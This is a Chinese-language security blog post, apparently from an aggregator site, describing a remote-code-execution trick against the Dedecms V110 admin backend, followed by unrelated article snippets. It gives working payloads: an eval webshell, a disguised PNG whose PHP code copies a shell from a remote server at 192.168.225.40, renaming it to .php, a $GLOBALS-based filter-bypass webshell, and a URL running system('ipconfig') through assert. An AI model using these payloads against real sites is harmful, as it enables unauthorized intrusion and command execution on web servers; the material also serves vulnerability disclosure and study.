当前位置：首页 > news >正文

Dedecms V110最新版RCE---Tricks

news 2026/5/26 19:58:58

前言

刚发现Dedecms更新了发布版本，顺便测试一下之前的day有没有修复，突然想到了新的tricks去实现RCE。

文章发布的时候估计比较晚了，一直没时间写了。

利用

/uploads/dede/article_string_mix.php
/uploads/dede/article_template_rand.php
/uploads/dede/sys_task.php
......

我发布的文档->>>>添加文档->>>>站内选择进行文件上传

/uploads/dede/content_list.php](http://dedecms.xyz:8066/uploads/dede/content_list.php?mid=1)
/uploads/dede/catalog_do.php?channelid=0&cid=0&dopost=addArchives

文件上传

在vps上起一个http的服务，端口设置为8016

远程服务器存放shell.php，文件内容为

<?php @eval ($_POST ['a']);?>

准备一个图片格式的文件,文件内容为，这里我上传的文件名称为f.png

<? copy("http://192.168.225.40:8016/shell.php","shell.php");?>

上传成功后可以看到上传的图片的位置

修改文件名为b.php

保存发现png图片已成功被更改，访问b.php,从远程vps下载了shell.php，当前目录下存在一个名称为shell.php的木马文件

利用webshell进行命令执行。

成功执行了命令

‍帮助网安学习，全套资料S信免费领取：
① 网安学习成长路径思维导图
② 60+网安经典常用工具包
③ 100+SRC分析报告
④ 150+网安攻防实战技术电子书
⑤ 最权威CISSP 认证考试指南+题库
⑥ 超1800页CTF实战技巧手册
⑦ 最新网安大厂面试题合集（含答案）
⑧ APP客户端安全检测指南（安卓+IOS）

思考

如果不考虑文件上传后缀名绕过方法，仅以上面图片格式的文件上传的话，那么无所谓上传的什么内容，因为本身来讲dede的代码中对文件内容是做的有校验的

所以文件内有两种绕过方法

正则绕过
disable函数绕过

简单搜索了一下各个平台的文章，其实是有师傅正则绕过实现webshell的。第二点儿，disable函数绕过，往前几个版本，有兴趣的可以看一下源码，之前利用全局变量Globals绕过

代码内容

<?php
$a = $GLOBALS["_GET"];
$b = $GLOBALS["_GET"];
$a['test1']($b['test2'])
?>

命令执行

http://dedecms.org:8016/uploads/shell.php?test1=assert&&test2=system(%22ipconfig%22);

成功执行命令,且该命令执行为未授权命令执行。

所以在官方前几个版本中已经更新了，添加进了禁用方法

所以在绕过禁用方法上来讲更容易一点儿。所以在利用上这里利用了copy函数的特性，那么这里提醒一下，其它的函数当然也可以满足效果。

Dedecms V110最新版RCE---Tricks

前言刚发现Dedecms更新了发布版本，顺便测试一下之前的day有没有修复，突然想到了新的tricks去实现RCE。文章发布的时候估计比较晚了，一直没时间写了。利用 /uploads/dede/article_string_mix.php /uploads/dede/article_template_rand.…...

编程日记 2023/8/15 6:18:18

CTFshow 限时活动红包挑战7、红包挑战8

CTFshow红包挑战7 写不出来一点，还是等了官方wp之后才复现。直接给了源码 <?php highlight_file(__FILE__); error_reporting(2);extract($_GET); ini_set($name,$value);system("ls ".filter($_GET[1])."" );function filter($cmd){$cmd…...

编程日记 2023/8/15 6:17:17

Redis使用Lua脚本和Redisson来保证库存扣减中的原子性和一致性

文章目录前言1.使用SpringBoot Redis 原生实现方式2.使用redisson方式实现3. 使用RedisLua脚本实现3.1 lua脚本代码逻辑 3.2 与SpringBoot集成 4. Lua脚本方式和Redisson的方式对比5. 源码地址6. Redis从入门到精通系列文章7. 参考文档前言背景：最近有社群技术交…...

编程日记 2023/8/15 6:16:16

【从零开始学Kaggle竞赛】泰坦尼克之灾

目录 0.准备1.问题分析挑战流程数据集介绍结果提交 2.代码实现2.1 加载数据2.1.1 加载训练数据2.1.2 加载测试数据 2.2 数据分析2.3 模型建立与预测 3.结果提交 0.准备注册kaggle账号后，进入titanic竞赛界面 https://www.kaggle.com/competitions/titanic 进入后界…...

编程日记 2023/8/15 6:15:15

输出无重复的3位数和计算无人机飞行坐标

编程题总结题目一：输出无重复的3位数题目描述从{1,2,3,4,5,6,7,8,9}中随机挑选不重复的5个数字作为输入数组‘selectedDigits’，能组成多少个互不相同且无重复数字的3位数?请编写程》序，从小到大顺序，以数组形式输出这些3位…...

编程日记 2023/8/15 6:14:12

muduo 29 异步日志

目录 Muduo双缓冲异步日志模型：异步日志实现：为什么要实现非阻塞的日志...

编程日记 2023/8/15 6:13:11

Qt 对象序列化/反序列化

阅读本文大概需要 3 分钟背景日常开发过程中，避免不了对象序列化和反序列化，如果你使用 Qt 进行开发，那么有一种方法实现起来非常简单和容易。实现我们知道 Qt 的元对象系统非常强大，基于此属性我们可以实现对象的序列化和…...

编程日记 2023/8/15 6:12:10

从零学算法（非官方题库）

输入两棵二叉树A和B，判断B是不是A的子结构。(约定空树不是任意一个树的子结构) B是A的子结构， 即 A中有出现和B相同的结构和节点值。例如: 给定的树 A:3/ \4 5/ \1 2给定的树 B：4 / 1返回 true，因为 B 与 A 的一个子树拥有相…...

编程日记 2023/8/15 6:11:08

Java # JVM内存管理

一、运行时数据区域程序计数器、Java虚拟机栈、本地方法栈、Java堆、方法区、运行时常量池、直接内存二、HotSpot虚拟机对象对象创建： 引用检查类加载检查分配内存空间：指针碰撞、空闲列表分配空间初始化对象信息设置（对象头内&#xff0…...

编程日记 2023/8/15 6:10:07

大疆第二批笔试复盘

大疆笔试复盘(8-14) 笔试时候的状态和下来复盘的感觉完全不一样，笔试时脑子是懵的。 (1)输出无重复三位数题目描述从 { 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 } \left \{ 1,2,3,4,5,6,7,8,9 \right \...

编程日记 2023/8/15 6:09:05

【Linux】磁盘或内存占用比较高要怎么排

当 Linux 磁盘空间满了时请注意，在进行任何删除操作之前，请确保你知道哪些文件可以安全删除，并备份重要文件，以免意外丢失数据。当 Linux 磁盘空间满了时，可以按照以下步骤进行排查： 检查磁盘使用情况&…...

编程日记 2023/8/15 6:08:04

解决xss转义导致转码的问题

一、xss简介人们经常将跨站脚本攻击（Cross Site Scripting）缩写为CSS，但这会与层叠样式表（Cascading Style Sheets，CSS）的缩写混淆。因此，有人将跨站脚本攻击缩写为XSS。跨站脚本攻击&#xff…...

编程日记 2023/8/15 6:07:03

一维向量求和： C A B 在有nv 近几年gpu的ubuntu 机器上， 环境预备： conda create -name numba_cuda_python3.10 python3.10 conda activate numba_cuda_python3.10conda install numba conda install cudatoolkit conda install -c nvi…...

编程日记 2023/8/15 6:06:01

BUUCTF 还原大师 1

题目描述： 我们得到了一串神秘字符串：TASC?O3RJMV?WDJKX?ZM,问号部分是未知大写字母，为了确定这个神秘字符串，我们通过了其他途径获得了这个字串的32位MD5码。但是我们获得它的32位MD5码也是残缺不全，E903???4D…...

编程日记 2023/8/15 6:04:57

自定义hook之首页数据请求动作封装 hooks

本例子实现了自定义hook之首页数据请求动作封装 hooks，具体代码如下 export type OrganData {dis: Array<{ disease: string; id: number }>;is_delete: number;name: string;organ_id: number;parent_id: number;sort: number; }; export type SwiperData …...

编程日记 2023/8/15 6:03:56

2023上半年京东手机行业品牌销售排行榜（京东数据平台）

后疫情时代，不少行业都迎来消费复苏，我国智能手机市场在今年上半年也实现温和的复苏，手机市场的出货量回暖。根据鲸参谋平台的数据显示，2023年上半年，京东平台上手机的销量为2830万，环比增长约4%&#xf…...

编程日记 2023/8/15 6:02:55

lodash之cloneDeep()源码阅读笔记

lodash之cloneDeep()源码阅读笔记基本上都在写业务代码，没有机会写库，还是想了解一下lodash的库源码是怎么样的，平时用的最多的就是cloneDeep()方法了，终于有空详细看看其中的源码。本文基于lodash5.0.0版本的源码进行阅读。 /…...

编程日记 2023/8/15 6:01:53

算法模版，今天开始背

二分查找算法 int left_bound(int[] nums, int target) {int left 0, right nums.length - 1;// 搜索区间为 [left, right]while (left < right) {int mid left (right - left) / 2;if (nums[mid] < target) {// 搜索区间变为 [mid1, right]left mid 1;} else if …...

编程日记 2023/8/15 6:00:52